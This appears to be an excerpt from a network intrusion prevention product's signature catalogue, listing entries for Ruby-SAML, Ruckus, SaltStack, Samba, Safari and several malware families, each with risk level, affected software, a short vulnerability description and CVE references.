https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45409

Ruby-Saml-Authentication-Bypass-CVE-2025-25291

About this vulnerability:

An attempt to exploit a vulnerability in ruby-saml detected

Risk:

High

First detected in:

sgpkg-ips-1850-5242

Last changed:

sgpkg-ips-1850-5242

Platform:

Generic

Software:

ruby-saml

Type:

Input Validation

Description:

ruby-saml provides security assertion markup language (SAML) single sign-on (SSO) for Ruby. An authentication bypass vulnerability was found in versions prior to versions 1.12.4 and 1.18.0 due to a parser differential. ReXML and Nokogiri are used by ruby-saml, which parse XML differently. As a result, the parsers can generate entirely different document structures from the same XML input. That allows an attacker to be able to execute a signature wrapping attack, leading to authentication bypass.

Situation:

References:

CVE-2025-25291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25291

Ruby-Saml-Authentication-Bypass-CVE-2025-25292

About this vulnerability:

An attempt to exploit a vulnerability in ruby-saml detected

Risk:

High

First detected in:

sgpkg-ips-1850-5242

Last changed:

sgpkg-ips-1850-5242

Platform:

Generic

Software:

ruby-saml

Type:

Input Validation

Description:

Situation:

HTTP_CRL-Ruby-Saml-XMLSecurity-DOCTYPE-Authentication-Bypass-CVE-2025-25291

References:

CVE-2025-25292
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25292

Ruby-Saml-XMLSecurity-DOCTYPE-Authentication-Bypass-CVE-2025-25291

About this vulnerability:

A vulnerability in SAML-Toolkits ruby-saml

Risk:

Moderate

First detected in:

sgpkg-ips-1866-5242

Last changed:

sgpkg-ips-1866-5242

Platform:

Generic

Software:

GitLab

Type:

Malfunction

Description:

The difference in how the XML DOCTYPE data is handled by parsers used within the library causes an authentication bypass vulnerability in Gitlab and other softare using Ruby-SAML. A successful exploitation allows an attacker to take over accounts on the target system.

Situation:

References:

CVE-2025-25291
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-25291

Ruby-WEBrick-Denial-Of-Service

About this vulnerability:

A Ruby WEBrick Denial Of Service vulnerability.

Risk:

High

First detected in:

sgpkg-ips-732-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

WEBrick

Type:

Insecure Configuration

Description:

A vulnerability in WEBrick, in Ruby, in multiple versions, which allows remote attackers to cause a denial of service condition via a crafted HTTP request that is processed by a backtracking regular expression.

Situation:

HTTP_CSH-Ruby-WEBrick-Denial-Of-Service

References:

CVE-2008-3656
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-3656

BID-30644
http://www.securityfocus.com/bid/30644

OSVDB-47471
http://www.osvdb.org/47471

Ruckus-Iot-Controller-Web-UI-Authentication-Bypass-Vulnerability

About this vulnerability:

A vulnerability in Ruckus IoT Controller

Risk:

High

First detected in:

sgpkg-ips-1295-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Ruckus IoT Controller

Type:

Malfunction

Description:

An authentication bypass vulnerability has been reported in Ruckus IoT Controller Web UI. The vulnerability is due to improperly handling of a crafted HTTP request. A remote attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could allow the attacker to bypass authentication. This situation may produce false positives since the hard-coded token may also be used in non-attack scenarios.

Situation:

HTTP_CRH-Ruckus-Iot-Controller-Web-UI-Authentication-Bypass-Vulnerability

References:

CVE-2020-26879
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26879

Ruckus-Iot-Controller-Web-UI-Createuser-Remote-Command-Injection

About this vulnerability:

A vulnerability in Ruckus IoT Controller

Risk:

High

First detected in:

sgpkg-ips-1298-5242

Last changed:

sgpkg-ips-1298-5242

Platform:

Generic

Software:

Ruckus IoT Controller

Type:

Input Validation

Description:

An remote command injection vulnerability has been reported in Ruckus IoT Controller Web UI. The vulnerability is due to improperly handling of a crafted HTTP request. A remote authenticated attacker could exploit the vulnerability by sending crafted HTTP requests to the target server. Successful exploitation could lead to arbitrary command execution in the context of the root user.

Situation:

File-Text_Ruckus-Iot-Controller-Web-UI-Createuser-Remote-Command-Injection

References:

CVE-2020-26878
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-26878

Ruckus-Wireless-Admin-Remote-Code-Execution-CVE-2023-25717

About this vulnerability:

A vulnerability in Ruckus Wireless Admin

Risk:

High

First detected in:

sgpkg-ips-1584-5242

Last changed:

sgpkg-ips-1584-5242

Platform:

Generic

Software:

Ruckus Wireless Admin

Type:

Input Validation

Description:

A remote code execution vulnerability has been reported in Ruckus Wireless Admin, versions up to and including 10.4.

Situation:

HTTP_CSU-Ruckus-Wireless-Admin-Remote-Code-Execution-CVE-2023-25717

References:

CVE-2023-25717
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25717

Rudder-Server-SQLi-Remote-Code-Execution

About this vulnerability:

An attempt to exploit a vulnerability in RudderStack detected

Risk:

High

First detected in:

sgpkg-ips-1626-5242

Last changed:

sgpkg-ips-1626-5242

Platform:

Unix

Software:

RudderStack

Type:

Input Validation

Description:

A vulnerability in RudderStack's rudder-server, versions prior to 1.3.0-rc.1, which allows remote attackers to execute arbitrary SQL commands via the source_id parameter to the pending-events and failed-events endpoints.

Situation:

HTTP_CRL-Rudder-Server-SQLi-Remote-Code-Execution

References:

CVE-2023-30625
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-30625

Rugged-Director-Denial-Of-Service

About this vulnerability:	A vulnerability in Rugged Director ROS allowing denial of service.
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Rugged Director
Type:	Malfunction
Description:	A vulnerability exists in Rugged Director ROS where an attacker can send custom UDP packets causing a denial of service condition.
Situation:	Generic_UDP-Rugged-Director-Denial-Of-Service

Rustdoor-Command-and-Control-Traffic

About this vulnerability:	Rustdoor command and control traffic
Risk:	High
First detected in:	sgpkg-ips-1737-5242
Last changed:	sgpkg-ips-1737-5242
Platform:	Windows; Mac OS
Software:	<os>
Type:	Backdoor
Description:	An HTTP request that matches a known Rustdoor command and control traffic pattern was detected. Rustdoor's capabilities include collecting and exfiltrating information and downloading additional files.
Situation:	HTTP_CS-Rustdoor-Command-and-Control-Traffic

Rustock-Bot

About this vulnerability:	Rustock Bot
Risk:	High
First detected in:	sgpkg-ips-619-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Code Injection
Description:	Rustock is a Botnet used for sending spam messages.
Situation:	HTTP_CS-Rustock-Bot-Traffic

Rustock-Spambot

About this vulnerability:	Rustock spambot is a template-based spamming engine
Risk:	High
First detected in:	sgpkg-ips-272-4219
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	Rustock spambot
Type:	Backdoor
Description:	Rustock spambot is a template-based spamming engine. Rustock spambot uses a rootkit to hide itself on the infected host.
Situation:	HTTP_CS-Rustock-Spambot

RX-Toolbar

About this vulnerability:	RX Internet Explorer toolbar
Risk:	Low
First detected in:	sgpkg-ips-35-1210
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	RX Toolbar
Type:	Misconfiguration
Description:	RX Toolbar is an Internet Explorer toolbar that provides links and searching for advertising purposes. It is bundled with KaZaa and may be considered unwanted software by some organizations.
Situation:	HTTP_CSH-RX-Toolbar-Activity

Saefko-RAT-C2-Traffic

About this vulnerability:	Saefko RAT C2 traffic was detected
Risk:	High
First detected in:	sgpkg-ips-1183-5242
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Saefko is a remote access trojan that can be used to control the infected system.
Situation:	HTTP_CSU-Saefko-RAT-C2-Traffic

Safari-In-Operator-Side-Effect-Exploit

About this vulnerability:

An attempt to exploit a vulnerability in Safari

Risk:

High

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

OS X

Software:

Safari

Type:

Type Confusion

Description:

There exists a vulberability in Safari, versions before 13.1.1, which allows remote attackers to execute arbitrary code due to a type confusion caused by a side-effect of the 'in' operator and the <embed> element with the PDF plugin.

Situation:

File-Text_Safari-In-Operator-Side-Effect-Exploit

References:

CVE-2020-9850
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-9850

Safari-Stack-Based-Out-Of-Bounds

About this vulnerability:

An attempt to exploit a vulnerability in Safari detected

Risk:

High

First detected in:

sgpkg-ips-1406-5242

Last changed:

sgpkg-ips-1406-5242

Platform:

Generic

Software:

Safari

Type:

Malfunction

Description:

An attempt to exploit a vulnerability in Safari detected.

Situation:

File-TextId_Safari-Stack-Based-Out-Of-Bounds

References:

CVE-2020-27930
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-27930

Safari-Webkit-Jit-Exploit-For-iOS

About this vulnerability:

An attempt to exploit a vulnerability in Safari Webkit JIT

Risk:

High

First detected in:

sgpkg-ips-1338-5242

Last changed:

sgpkg-ips-1338-5242

Platform:

OS X

Software:

Safari

Type:

Malfunction

Description:

There exists a vulberability in Safari Webkit JIT, multiple versions, which allows remote attackers to write shellcode to an RWX memory section in JavaScriptCore and execute it.

Situation:

File-Text_Safari-Webkit-Jit-Exploit-For-iOS

References:

CVE-2016-4669
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-4669

Safenet-HASP-SL-ActiveX-Control-ChooseFilePath-Buffer-Overflow

About this vulnerability:

A vulnerability in SafeNet Privilege SCP (HASP SL)

Risk:

Moderate

First detected in:

sgpkg-ips-490-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SafeNet Privilege SCP

Type:

Buffer Overflow

Description:

A stack buffer overflow vulnerability exists in SafeNet HASP SL's ActiveX control. The vulnerability is due to insufficient input validation while handling parameters to the ChooseFilePath() function. A remote, unauthenticated attacker can exploit this vulnerability by enticing a user to access a malicious web site. This can lead to code execution in the context of the affected user.

Situation:

File-Text_Safenet-HASP-SL-ActiveX-Control-ChooseFilePath-Buffer-Overflow

References:

BID-56297
http://www.securityfocus.com/bid/56297

OSVDB-86723
http://www.osvdb.org/86723

Safenet-Softremote-Stack-Based-Buffer-Overflow

About this vulnerability:

Safenet Softremote Stack Based Buffer Overflow

Risk:

High

First detected in:

sgpkg-ips-653-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Windows

Software:

SafeNet SoftRemote

Type:

Buffer Overflow

Description:

An stack based buffer overflow vulnerability in SafeNet SoftRemote, before version 10.8.6, which allows attackers to remotly execute arbitrary code via a long UDP request.

Situation:

Generic_UDP-Safenet-Softremote-Stack-Based-Buffer-Overflow

References:

CVE-2009-1943
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-1943

BID-35154
http://www.securityfocus.com/bid/35154

OSVDB-54831
http://www.osvdb.org/54831

Sage-Saleslogix-GetConnection-Account-Disclosure

About this vulnerability:

Sage SalesLogix GetConnection Account Disclosure

Risk:

Moderate

First detected in:

sgpkg-ips-507-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SalesLogix

Type:

Script Injection

Description:

A bug exists in Sage SalesLogix CRM 6.1 allowing remote attacker to potentially query for password without authentication.

Situation:

Generic_CS-Sage-Saleslogix-GetConnection-Account-Disclosure

References:

CVE-2004-1611
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-1611

BID-11450
http://www.securityfocus.com/bid/11450

OSVDB-10948
http://www.osvdb.org/10948

OSVDB-10947
http://www.osvdb.org/10947

Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution

About this vulnerability:

A vulnerability in Sage X3.

Risk:

High

First detected in:

sgpkg-ips-1401-5242

Last changed:

sgpkg-ips-1401-5242

Platform:

Windows

Software:

Sage X3

Type:

Insecure Configuration

Description:

A vulnerability in Sage X3, versions before 93.2.53, which allows remote attackers to execute arbitrary commands by allowing the discovery of the installation path, CVE-2020-7387, and allowing an authentication bypass and file upload, which contains the malicious commands, to that location CVE-2020-7388.

Situation:

Generic_CS-Sage-X3-Administration-Service-Authentication-Bypass-Command-Execution

References:

CVE-2020-7388
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-7388

Sagem-Fast-3304-V1-Denial-Of-Service

About this vulnerability:	Sagem Fast 3304-V1 Denial Of Service Vulnerability
Risk:	High
First detected in:	sgpkg-ips-627-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SAGEM 3304
Type:	Malfunction
Description:	A denial of service vulnerability in SubmitMaintCONFIG, via the ACTION parameter, which allows an attacker to specially craft a request causing a system reboot or reset.
Situation:	HTTP_CSU-Sagem-Fast-3304-V1-Denial-Of-Service

SAGEM-Fast-Routers-3304-3464-3504-Authentication-Bypass

About this vulnerability:	A vulnerability in SAGEM routers 3304/3464/3504
Risk:	High
First detected in:	sgpkg-ips-609-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Generic
Software:	SAGEM 3304; SAGEM 3464; SAGEM 3504
Type:	Malfunction
Description:	There is an authentication bypass vulnearbility in Sagem Fast routers 3304/3464/3504.
Situation:	Telnet_CS-SAGEM-Router-Fast-3304-3464-3504-Authentication-Bypass

Saint-Bot-Infection-Traffic

About this vulnerability:	Saint Bot malware infection traffic detected
Risk:	High
First detected in:	sgpkg-ips-1341-5242
Last changed:	sgpkg-ips-1341-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Saint Bot infection traffic was detected.
Situation:	File-Text_Saint-Bot-Infection-Traffic

SalesAgility-SuiteCRM-Email_recipients-Remote-Code-Execution

About this vulnerability:

A vulnerability in SalesAgility SuiteCRM.

Risk:

High

First detected in:

sgpkg-ips-1462-5242

Last changed:

sgpkg-ips-1462-5242

Platform:

Generic

Software:

SalesAgility

Type:

Input Validation

Description:

A vulnerability in SalesAgility SuiteCRM, versions SuiteCRM 7.12.4 and prior, SuiteCRM-Core 8.0.3 and prior, which allows remote attackers to execute arbitrary code by sending a crafted request, due to the improper input validation for the email_recipients propery.

Situation:

HTTP_CS-SalesAgility-SuiteCRM-Email_recipients-Remote-Code-Execution

References:

CVE-2022-23940
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-23940

Saleslogix-Eviewer-Admin-Command

About this vulnerability:

SalesLogix eViewer slxweb.dll admin command

Risk:

High

First detected in:

sgpkg-ips-58-1210

Last changed:

sgpkg-ips-1636-5242

Platform:

Windows

Software:

SalesLogix

Type:

Malfunction

Description:

SalesLogix eViewer allows unauthorized access to the slxweb.dll that can be requested to perform commands. The server runs with administrative privileges and the slxweb.dll cannot be moved.

References:

CVE-2000-0278
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2000-0278

BID-1089
http://www.securityfocus.com/bid/1089

Sality-Virus

About this vulnerability:	Sality virus
Risk:	High
First detected in:	sgpkg-ips-531-5211
Last changed:	sgpkg-ips-1296-5242
Platform:	Windows
Software:	<os>
Type:	Backdoor
Description:	Sality is a virus which infects shared drives and Windows executable files. It contains downloader functionality to further install Trojan or key logger components. Sality opens a backdoor that allow the remote attacker o get the full control over the infected computer and in turn the confidential information, representing a serious security risk.
Situation:	HTTP_CS-Sality-Botnet-Activity HTTP_CSH-Sality-Virus-User-Agent

SaltStack-Salt-API-SSH-Client-Command-Injection

About this vulnerability:

A vulnerability in SaltStack Salt

Risk:

Moderate

First detected in:

sgpkg-ips-1315-5242

Last changed:

sgpkg-ips-1315-5242

Platform:

Generic

Software:

SaltStack Salt

Type:

Input Validation

Description:

Improper sanitization of URL parameters causes a command injection vulnerability in Salt. A succesful exploit allows a remote attacker to execute arbitrary code on the target system with the privileges of the target process, which is often root.

Situation:

HTTP_CRL-SaltStack-Salt-API-SSH-Client-Command-Injection
File-Text_SaltStack-Salt-API-SSH-Client-Command-Injection

References:

CVE-2020-16846
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16846

SaltStack-Salt-Authorization-Bypass

About this vulnerability:

A vulnerability in Saltstack Salt Authorization Bypass

Risk:

High

First detected in:

sgpkg-ips-1248-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SaltStack Salt

Type:

Malfunction

Description:

There exists an authorization bypass vulnerability in SaltStack Salt framework. Successful exploitation could lead in arbitrary code execution.

Situation:

Generic_CS-SaltStack-Salt-Authorization-Bypass

References:

CVE-2020-11651
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11651

SaltStack-Salt-Clearfuncs-Directory-Traversal

About this vulnerability:

A vulnerability in SaltStack Salt

Risk:

Moderate

First detected in:

sgpkg-ips-1252-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

SaltStack Salt

Type:

Directory Traversal

Description:

Improper path sanitization causes a directory traversal vulnerability in Salt. A successful exploit may allow an attacker to write to arbitrary locations on the target systen and thus gain the ability to execute arbitrary code thereon.

Situation:

Generic_CS-SaltStack-Salt-Clearfuncs-Directory-Traversal

References:

CVE-2020-11652
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11652

SaltStack-Salt-Salt.wheel.pillar_roots.write-Method-Directory-Traversal

About this vulnerability:

A vulnerability in SaltStack Salt

Risk:

Moderate

First detected in:

sgpkg-ips-1329-5242

Last changed:

sgpkg-ips-1329-5242

Platform:

Generic

Software:

SaltStack Salt

Type:

Directory Traversal

Description:

There exists a directory traversal vulnerability in the SaltStack Salt. Successful exploitation could lead in arbitrary file creation or code execution.

Situation:

HTTP_CRL-SaltStack-Salt-Salt.wheel.pillar_roots.write-Method-Directory-Traversal

References:

CVE-2021-25282
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25282

Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access

About this vulnerability:

A vulnerability in Samba

Risk:

Moderate

First detected in:

sgpkg-ips-449-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

An out-of-bounds array access leading to heap memory corruption has been reported in Samba. The vulnerability is due to an error in Samba's RPC code generator. A remote, unauthenticated attacker could exploit this vulnerability by sending malicious Server Message Block (SMB) traffic to a vulnerable server. A successful exploitation attempt may result in the execution of arbitrary code as the 'root' user.

Situation:

MSRPC-TCP_Samba-DCE-RPC-IDL-Parser-Out-Of-Bounds-Array-Access
MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-EventLog
MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-LsarLookupNames3
MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-Vulnerable-Function-Call
MSRPC-TCP_Samba-IDL-Parser-Out-Of-Bounds-Array-SetInfoPolicy

References:

CVE-2012-1182
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1182

BID-52973
http://www.securityfocus.com/bid/52973

Samba-DNS-Reply-Flag-Denial-Of-Service

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-591-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

A denial of service vulnerability exists in Samba's internal DNS server. The server fails to check the reply flag of DNS packets, making it vulnerable to reply to a spoofed reply. This could result in a "ping-pong" type attack where two vulnerable servers attack each other. An attacker could exploit this vulnerability by sending a DNS query to a vulnerable server with a spoofed source IP address of another vulnerable server. Successful exploitation could result in excessive consumption of resources on both vulnerable servers, possibly causing a denial of service condition.

Situation:

DNS-UDP_Samba-DNS-Reply-Flag-Denial-Of-Service

References:

CVE-2014-0239
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0239

OSVDB-107484
http://www.osvdb.org/107484

Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

High

First detected in:

sgpkg-ips-1274-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Resource Starvation

Description:

A denial of service vulnerability has been reported in Samba. The vulnerability is due to insufficient handling of deeply nested filters in LDAP requests. A remote, unauthenticated attacker can exploit this vulnerability by sending crafted LDAP requests to the target service. Successful exploitation could result in the exhaustion of the stack, causing the Samba process to terminate.

Situation:

LDAP_CS-Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service
LDAP-UDP_Samba-LDAP-Ad-Dc-Nested-Filter-Denial-Of-Service

References:

CVE-2020-10704
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-10704

Samba-LDAP-Ad-Dc-Paged-Search-DoS

About this vulnerability:

A vulnerability in Samba

Risk:

Moderate

First detected in:

sgpkg-ips-1190-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

A vulnerability in Samba, vesions 4.10.x prior to 4.10.5, which allows remote attackers to cause a denial of service condition by sending a crafted LDAP request to a vulnerable server, due to improper processing of paged LDAP searches when Samba is configured as an Active Directory Domain Controller.

Situation:

LDAP_CS-Samba-LDAP-Ad-Dc-Paged-Search-DoS

References:

CVE-2019-12436
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-12436

Samba-LDAP-Ad-Dc-Privilege-Escalation

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-1053-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Malfunction

Description:

There has been reported a privilege escalation vulnerability in Samba. Permissions aren't properly validated, when Samba is Active Directory Domain Controller, which could allow authenticated attackers to change other users' passwords.

Situation:

LDAP_CS-Samba-LDAP-Ad-Dc-Privilege-Escalation

References:

CVE-2018-1057
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-1057

Samba-LDAP-Server-Libldb-Infinite-Loop-Denial-Of-Service

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-720-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Infinite Loop

Description:

Crafted packets may be used to trigger a parsing error which causes an infinite loop and results in a denial of service condition.

Situation:

LDAP_CS-Samba-LDAP-Server-Libldb-Infinite-Loop-Denial-Of-Service

References:

CVE-2015-3223
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-3223

Samba-LSA-RPC-LsaIoTransNames-Request-Handling-Heap-Overflow

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

High

First detected in:

sgpkg-ips-357-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability exists in the way Samba handles RPC messages. The vulnerability is due to a boundary error while performing specific RPC operations. Remote authenticated attackers can exploit this vulnerability by sending a specially crafted RPC request to the LSA RPC interface. Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the vulnerable system in the context of the affected process. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the Unix account mapped for the SMB user. In an attack case where code injection is not successful, if Samba server is running in daemon mode, the child process that handles the attacker's connection will not terminate.

Situation:

MSRPC-TCP_CPS-Samba-LSA-RPC-LsaIoTransNames-Request-Handling-Heap-Overflow

References:

CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446

BID-23973
http://www.securityfocus.com/bid/23973

Samba-LSA-RPC-LsarAddPrivilegesToAccount-Crafted-Request-Handling-Heap-Overflow

About this vulnerability:

A vulnerability in Samba

Risk:

High

First detected in:

sgpkg-ips-357-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A heap-based buffer overflow vulnerability exists in the way Samba handles RPC messages. The vulnerability is due to a boundary error while performing "LsarAddPrivilegesToAccount" operation. Remote authenticated attackers can exploit this vulnerability by sending a specially crafted RPC request to the LSA RPC interface. Successful exploitation of this vulnerability allows attackers to execute arbitrary code on the vulnerable system in the context of the affected process. If code injection attack is successful, the behaviour of the target is entirely dependent on the intended function of the injected code. The code in such a case would execute within the security of the affected process, commonly the Unix account mapped for the SMB user. In an attack case where code injection is not successful, if Samba server is running in daemon mode, the child process that handles the attacker's connection will not terminate.

Situation:

MSRPC-TCP_Samba-RPC-LsarAddPrivilegesToAccount-Crafted-Request-Handling-Overflow

References:

CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446

BID-23973
http://www.securityfocus.com/bid/23973

Samba-Mangling-Method-Buffer-Overflow

About this vulnerability:

A vulnerability in Samba

Risk:

High

First detected in:

sgpkg-ips-409-4219

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

There is a vulnerability in the way Samba handles Name Mangling in its file system sharing process. A specially crafted file name could trigger a stack buffer overflow if the mangling method was set to hash. An attacker can exploit this vulnerability to execute arbitrary code with the privileges of the Samba process. Generally, Samba executes as root user and has access to system privileges.

Situation:

SMB-TCP_Samba-Mangling-Method-Buffer-Overflow

References:

CVE-2004-0686
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0686

Samba-MS-RPC-Remote-Command-Execution

About this vulnerability:

A Samba MS-RPC Remote Command Execution vulnerability.

Risk:

High

First detected in:

sgpkg-ips-712-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Input Validation

Description:

A vulnerability in Samba, versions 3.0.0 through 3.0.25rc3, which allows remote users to execute arbitrary commands via a crafter USER parameter.

Situation:

SMB-TCP_Samba-MS-RPC-Remote-Command-Execution

References:

CVE-2007-2447
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2447

BID-23972
http://www.securityfocus.com/bid/23972

OSVDB-34700
http://www.osvdb.org/34700

Samba-Ndr-Parsing-Ndr_Pull_Dnsp_Name-Integer-Overflow

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-842-5242

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Integer Overflow

Description:

Incorrect parsing of data in the ndr_pull_dnsp_name() function causes an integer overflow vulnerability in Samba. A successfull exploitation allows an attacker to run arbitrary code on the target system.

Situation:

LDAP_CS-Samba-Ndr-Parsing-Ndr_Pull_Dnsp_Name-Integer-Overflow

References:

CVE-2016-2123
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-2123

Samba-NetBIOS-Replies-Stack-Based-Buffer-Overflow

About this vulnerability:

Samba NetBIOS Replies Stack Based Buffer Overflow vulnerability.

Risk:

High

First detected in:

sgpkg-ips-681-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Samba 3.0.0 through 3.0.26a that allows remote attackers to execute arbitrary code via a crafted WINS Name Registration request.

Situation:

Generic_UDP-Samba-NetBIOS-Replies-Stack-Based-Buffer-Overflow

References:

CVE-2007-5398
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-5398

BID-26455
http://www.securityfocus.com/bid/26455

Samba-NetDFS-RPC-NetDFS-io-dfs-EnumInfo-D-Handling-Heap-Overflow

About this vulnerability:

Buffer overflow vulnerability in Samba

Risk:

High

First detected in:

sgpkg-ips-110-2032

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

There is a heap-based buffer overflow vulnerability in Samba. A crafed NetDfsEnum RPC request to the vulnerable Samba server allows arbitrary code execution with the privileges of the affected service process.

Situation:

MSRPC-TCP_CPS-Samba-NetDFS-RPC-NetDFS-io-dfs-EnumInfo-D-Handling-Heap-Overflow

References:

CVE-2007-2446
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-2446

BID-24198
http://www.securityfocus.com/bid/24198

OSVDB-34699
http://www.osvdb.org/34699

Samba-Nmbd-Sys_recvfrom-Infinite-Loop-Denial-Of-Service

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

High

First detected in:

sgpkg-ips-598-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Infinite Loop

Description:

A denial of service vulnerability exists in Samba nmbd daemon. The vulnerability is due to an error when handling crafted NetBIOS packets that causes nmbd to enter an infinite loop. A remote unauthenticated attacker could exploit this vulnerability by sending a malicious request to the server. Successful exploitation could lead to a denial of service condition on the server.

Situation:

UDP_Checksum-Mismatch

References:

CVE-2014-0244
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-0244

OSVDB-108348
http://www.osvdb.org/108348

Samba-Nmbd-Unstrcpy-Buffer-Overflow

About this vulnerability:

A vulnerability in Samba Team Samba

Risk:

Moderate

First detected in:

sgpkg-ips-601-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A buffer overflow vulnerability exists in Samba. The vulnerability is due to using incorrect buffer size in a string copy operation in the nmbd daemon. A remote, unauthenticated attacker could exploit this vulnerability by sending malicious packets to a vulnerable nmbd service. A successful attack could result in arbitrary code execution with the privileges of the superuser while an unsuccessful attack will result in the application to terminate or stop responding.

Situation:

SMB-TCP_Samba-Nmbd-Unstrcpy-Buffer-Overflow

References:

CVE-2014-3560
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3560

BID-69021
http://www.securityfocus.com/bid/69021

OSVDB-109760
http://www.osvdb.org/109760

Samba-Nttrans-Buffer-Overflow

About this vulnerability:

A Samba nttrans Buffer Overflow vulnerability

Risk:

High

First detected in:

sgpkg-ips-796-5211

Last changed:

sgpkg-ips-1296-5242

Platform:

Generic

Software:

Samba

Type:

Buffer Overflow

Description:

A vulnerability in Samba, versions 2.2.2 - 2.2.6, which allows remote attackers to execute arbitrary code via a long encrypted password due to the lack of length checking for encrypted password change requests from clients.

Situation:

